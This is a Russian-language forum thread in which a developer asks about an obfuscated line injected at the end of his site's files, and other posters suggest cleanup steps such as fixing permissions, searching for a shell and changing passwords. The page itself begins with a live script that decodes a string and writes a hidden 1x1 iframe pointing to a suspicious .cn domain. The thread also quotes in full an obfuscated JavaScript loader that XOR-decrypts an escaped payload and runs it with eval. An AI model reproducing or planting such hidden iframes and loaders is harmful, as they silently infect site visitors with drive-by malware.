<html> <body><script>var source ="=jgsbnf!tsd>(iuuq;00iv2.iv2/do0dpvoufs0joefy/qiq(!xjeui>2!ifjhiu>2!gsbnfcpsefs>1?=0jgsbnf?"; var result = "";
for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);
document.write(result); </script>
Хакнули хостинг?
В один прекрасный день написал мне человек, и сказал что не может зайти в админку сайта.
Покопавшись в коде обнаружил оооооооочень странные строчки, которые я ТОЧНО никогда там не писал (сайт разрабатывал я).
Строчки эти (точнее одна строчка) были распиханы в конце некоторых файлов (не всех).
Вот файл с этой строчкой (оч длинная). Гляньте на неё, и скажите что думаете по этому поводу.
Заранее спасибо!
Покопавшись в коде обнаружил оооооооочень странные строчки, которые я ТОЧНО никогда там не писал (сайт разрабатывал я).
Строчки эти (точнее одна строчка) были распиханы в конце некоторых файлов (не всех).
Вот файл с этой строчкой (оч длинная). Гляньте на неё, и скажите что думаете по этому поводу.
Заранее спасибо!
Такие строчки в эксплоитах обычно встречаются. И называются шелкодами.
В данном конкретном случае затрудняюсь сказать, что это. Скорее всего, какой нибудь бэкдор.
в нормальном представлении, эта длинная строка выглядит так:
В данном конкретном случае затрудняюсь сказать, что это. Скорее всего, какой нибудь бэкдор.
в нормальном представлении, эта длинная строка выглядит так:
Цитата:
function jSB510L(p13){function zUt(bPvzw){var aLsaNMC=0;var lxmbwh=bPvzw.length;var zf5=0;while(zf5<lxmbwh){aLsaNMC+=ws6(bPvzw,zf5)*lxmbwh;zf5++;}return (aLsaNMC+'');}function ws6(hg3f,v7M){return hg3f.charCodeAt(v7M);} try {var tB4zJ=eval('a6r*g+u*m*e+nytysV.6c*a6lyl+eVe*'.replace(/[\+\*Vy6]/g, '')),pixG='';var p5fhadh=0,nUTn=0,dZ15A=(new String(tB4zJ)).replace(/[^@a-z0-9A-Z_.,-]/g,'');var vAm2IK=zUt(dZ15A);p13=unescape(p13);for(var h7o0L7=0; h7o0L7 < (p13.length); h7o0L7++){var txNT0X=ws6(dZ15A,p5fhadh)^ws6(vAm2IK,nUTn);var xC0BKNH=ws6(p13,h7o0L7);p5fhadh++;nUTn++;if(nUTn>vAm2IK.length)nUTn=0;if(p5fhadh>dZ15A.length)p5fhadh=0;pixG+=String.fromCharCode(xC0BKNH^txNT0X) + '';}eval(pixG); return pixG=new String();}catch(e){}}jSB510L('%32%38%31%31%34%39%30%30%4a%16%03%4b%68%6a%5d%69%7a%4e%6f%3a%26%1d%28%3e%71%2e%08%08%38%3c%15%3b%33%22%66%5c%60%22%1c%2e%27%12%1c%17%49%0d%37%30%29%2d%38%3e%22%0c%70%52%67%2d%36%79%3f%21%07%3a%22%71%6e%2e%39%2f%22%40%70%21%79%79%70%38%25%35%40%33%25%32%27%6d%32%3e%13%18%3a%13%52%1b%2d%2e%63%2a%1f%22%6a%32%75%27%2c%2b%3f%17%30%31%2f%3c%00%3e%68%27%45%6d%6d%64%62%72%55%68%71%3a%17%12%24%6a%39%35%2b%32%06%39%19%23%6b%29%3b%2a%76%11%79%2f%51%72%78%76%38%6e%1d%3f%2b%41%38%75%31%31%34%52%4b%77%33%21%1b%2e%32%6e%22%28%62%26%26%38%2e%68%52%42%29%1e%21%22%7c%2e%27%67%00%75%29%61%74%34%25%33%69%37%05%62%62%7a%7c%34%7c%2d%42%24%0b%20%4b%2f%31%25%74%0f%34%2a%47%0c%63%2a%79%34%59%75%27%13%33%01%22%2d%60%4e%73%79%7e%79%3c%23%6a%55%64%6c%38%2d%7c%55%28%61%1e%0d%22%22%07%2b%32%7e%3d%38%1b%1b%65%2e%5b%27%6b%3b%21%01%36%7b%7f%51%77%29%68%20%06%2b%1c%6f%08%0a%67%79%35%11%7f%22%25%26%6b%53%7f%39%69%1c%3a%14%2c%22%06%72%38%63%69%6d%2c%30%35%1b%0e%07%32%36%2f%28%6e%60%77%76%79%56%2e%66%3a%69%34%62%15%62%7e%3b%62%3b%3b%5f%68%25%60%50%78%33%36%37%74%61%31%36%44%29%69%11%6a%62%62%62%22%0d%12%0f%75%00%2c%24%2e%7d%21%6a%6b%58%3c%30%64%3f%2b%4f%37%3c%34%27%63%2b%08%14%5c%08%07%7c%33%0d%08%3a%6e%48%69%3b%04%60%04%52%0d%45%55%7d%4a%25%2a%6e%3b%2e%32%4f%46%07%33%35%2b%26%76%3d%4d%3f%78%59%4f%06%77%12%3a%60%0f%63%34%34%29%25%15%52%4f%1a%24%76%6c%69%3f%6b%0a%7e%32%3d%3d%7e%18%2b%7f%66%25%6a%14%3c%5e%63%26%03%30%0d%13%3b%78%20%72%69%2c%25%41%21%18%3a%34%79%65%14%50%66%64%64%2a%3a%23%7b%37%21%0a%77%54%02%0c%68%26%75%10%39%63%4e%5c%5c%18%5b%58%63%5f%55%47%75%01%38%3c%7f%3b%15%2f%06%04%22%3c%28%10%10%22%6a%78%62%54%06%7b%75%5d%3e%7c%63%70%08%3e%3f%22%61%1a%09%59%2b%29%68%3f%1a%67%5d%60%2e%4d%14%65%42%69%00%06%7f%35%09%66%74%28%21%29%03%3d%21%01%6d%79%32%1a%14%45%18%25%24%1a%25%65%36%52%6d%56%2f%6e%6b%32%27%31%7d%19%33%31%21%41%2d%7e%23%71%0f%22%3b%33%2b%28%74%3e%6c%15%24%68%6f%6e%75%6b%33%7b%0d%26%64%29%2c%71%28%6e%63%0e%50%28%3c%10%0a%1f%6f%6a%0d%2d%0b%26%3f%20%7d%62%33%1c%25%24%33%30%36%3c%2f%38%41%6e%2a%37%2d%32%32%79%5b%4f%67%1e%56%06%66%21%26%3f%40%65%34%63%3e%25%74%37%63%57%60%6d%6d%38%1a%6c%7b%36%10%30%3a%38%35%62%77%31%08%0b%2b%16%09%02%7a%68%2c%6b%11%29%55%62%64%64%64%22%69%53%4c%5b%64%4f%33%18%3e%0b%05%59%33%3c%7a%2a%60%6a%66%07%23%7f%13%48%6f%6e%3d%5b%52%16%73%7a%15%34%67%2e%34%13%3b%71%7d%0f%11%2a%51%63%70%43%15%77%2e%5f%6f%76%65%59%2e%23%2d%38%39%22%2e%6f%0b%13%2f%30%6e%73%34%0f%29%41%1b%3f%27%68%04%22%2d%32%07%30%02%12%68%2b%5f%3e%36%0d%2b%27%7e%31%3e%16%3a%74%1f%54%74%64%05%7c%4a%54%63%51%33%38%78%33%07%2a%28%15%3e%74%03%13%25%06%6d%6e%4a%57%72%17%22%74%6e%23%30%7d%5a%2a%2f%20%26%64%64%3e%67%59%6c%2d%6d%64%6c%55%6e%4b%7e%4e%3b%02%32%1c%3c%27%31%31%34%40%27%15%68%16%36%1f%0a%01%6c%19%65%39%6b%07%37%29%61%6e%0d%00%74%0d%26%20%53%7e%4d%5b%4f%3d%52%1c%5e%27%07%76%32%75%63%6d%21%6f%6d%30%37%5f%5d%23%31%0a%16%46%32%38%31%69%1e%34%42%40%27%46%23%79%6e%6f%23%2a%73%43%38%34%2f%0e%76%2b%76%22%1a%7b%11%38%2b%09%43%38%35%09%33%1f%4d%12%23%0c%35%2c%3b%18%78%39%3b%37%76%6d%72%0d%49%00%3a%6f%3a%2b%28%2c%4a%6b%75%64%70%6b%11%64%71%34%6e%3a%74%30%68%30%74%27%50%20%16%22%34%31%6c%15%0b%34%55%51%65%25%28%39%34%6a%0f%2f%39%74%5b%27%2e%23%01%4f%32%31%21%4f%60%14%18%0b%25%23%2e%0b%4b%68%0e%36%27%15%37%27%36%67%1b%24%26%30%4e%60%24%24%2c%39%0c%30%75%55%09%38%37%28%78%75%74%6b%5b%7e%77%7f%19%7a%28%32%3b%54%66%6a%7f%7c%40%5b%79%7d%10%1a%24%68%22%6f%71%7e%74%01%35%33%3a%2d%08%23%37%04%51%61%6f%78%70%32%30%15%30%4f%1b%10%06%53%23%36%26%0f%0c%2d%33%28%3e%7e%40%66%70%57%3b%73%7d%7f%78%6d%3c%2a%09%6e%30%32%74%68%2f%3b%3c%4c%7f%6d%0c%5a%39%6c%27%62%5a%63%77%50%1f%7a%5b%5a%5d%50%68%20%21%04%32%2f%26%7f%1f%74%25%72%15%77%70%68%74%5d%7a%2a%6a%74%60%67%62%7c%4f%5c%6b%7b%5f%0d%12%3f%36%40%36%29%2c%0c%3b%20%27%55%1c%27%62%39%7a%6a%27%5d%69%45%64%63%61%7f%77%7e%77%3e%47%22%7e%38%2c%04%22%74%7e%61%32%26%6f%0f%6e%3b%28%32%09%7b%31%5f%75%2f%07%3d%7c%46%71%3c%6b%22%3d%2b%28%34%09%2e%62%2b%2c%4d%30%2a%3b%0e%77%20%72%7a%30%17%34%2d%5c%34%26%7a%7c%34%33%09%22%5f%30%42%7c%2d%28%24%4d%77%1c%7b%3e%65%25%7c%37%37%30%5f%23%38%01%12%7a%7e%65%1b%32%6d%25%59%64%3e%2d%0b%2b%5c%32%38%25%31%17%61%26%52%07%7b');
Хм.. ну по поводу того КАК это сделали - скорей всего думаю был украден пароль от фтп, с одной из машин с которых я заходил.. Взлом сайта маловероятен, т.к. ломать-то там пока что особо-то и нечего :)
Вот всё-же остаётся интересным - что-же это такое, что делает, откуда исходит активность, и т.п.
Вот всё-же остаётся интересным - что-же это такое, что делает, откуда исходит активность, и т.п.
шесьнадцатеричные числа декодировке с разгону не поддаются.
Цитата:
Взлом сайта маловероятен, т.к. ломать-то там пока что особо-то и нечего
смотря какие настройки у хоста и т.д., так как порой лишний левый проксик или дополнительная спам-машина не повредит.
З.Ы. сорри за то, что привел ввиде цитаты - в виде кода вообще нечитабельно выглядело.
Полазал по инету, возможно это JS/Xorer
Я скока ни лазил - ничё толком не нашёл. Был и в энциклопедии на viruslist.ru но там тоже голь
короче, единственнео что я могу посоветовать - поудалять это нафик. если есть чистая копия, перезалейте. выставьте правильно права для скриптов сайта. если будет появляться, попробуйте постучать хостеру, может это его проблемы.
Та уже вроде как вычистил. Поменяли пароль от ФТП, попросили у хостера логи за последнее время.
А вот кстати вопрос. Есть софтина какая-нибудь, которая код может просканить на вредоносные куски?
А вот кстати вопрос. Есть софтина какая-нибудь, которая код может просканить на вредоносные куски?
у нашего клиента на хостинге, недавно появился скрипт
в конце каждого HTML или PHP файла, где был </html> тег... влом был через один из PHP-шных скриптов ))) широкораспространённых общедоступных поделок по типу WordPress или PhpMyAdmin, я хз точно через что. в общем, поудаляли, пофиксали, пароли сменили...
эта фиговина перекидывала браузер на доменчег hu1-hu1.cn ( зареган хз где, принадлежит украинцам :) ) и предлагала скачать некорректную PDF-ку, хз что она делает ) мне пофик я не под WinOS смотрел это :) Вот если по этому домену погуглить, то можно найти много... а ваш эксплоит чегой делал?
Код:
эта фиговина перекидывала браузер на доменчег hu1-hu1.cn ( зареган хз где, принадлежит украинцам :) ) и предлагала скачать некорректную PDF-ку, хз что она делает ) мне пофик я не под WinOS смотрел это :) Вот если по этому домену погуглить, то можно найти много... а ваш эксплоит чегой делал?
а я хз если честно. Никакой активности не заметил, кроме вывода этого дива на странице в коде :))
На первый взгляд это вирус при чем залит ботом. Народ уже ругается по инету на него (точнее модификации).
Что там закодировано сходу не скажешь.
А вот то что нужно сделать.
1. Расставить права на файлы (из за того что в файлы скриптов можно было писать вам и вставили эти куски)
2. Поискать у себя шелл
3. Сменить пароли.
Похоже этот бот ищет сайты на каком-то определенном движке и использует его уязвимость для залива вредоносного кода.
Что там закодировано сходу не скажешь.
А вот то что нужно сделать.
1. Расставить права на файлы (из за того что в файлы скриптов можно было писать вам и вставили эти куски)
2. Поискать у себя шелл
3. Сменить пароли.
Похоже этот бот ищет сайты на каком-то определенном движке и использует его уязвимость для залива вредоносного кода.
Двиг самописный :)
А права уже повыставлял. вроде пока всё окей
А права уже повыставлял. вроде пока всё окей